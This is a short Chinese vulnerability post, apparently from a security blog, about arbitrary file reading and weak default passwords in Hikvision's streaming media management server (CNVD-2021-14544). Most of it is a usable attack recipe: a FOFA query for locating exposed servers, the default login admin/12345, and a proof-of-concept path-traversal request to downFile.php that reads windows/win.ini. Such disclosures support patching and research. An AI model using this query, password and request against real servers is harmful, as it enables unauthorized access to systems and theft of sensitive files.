# 海康威视 流媒体管理服务器任意文件读取/通用弱口令 CNVD-2021-14544
杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。
FOFA:
“`
title=”流媒体管理服务器”
“`
默认口令:admin/12345
**PoC:**
“`
GET /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host:
“`
ref:
* https://forum.ywhack.com/thread-115314-1-8.html
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-14544
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容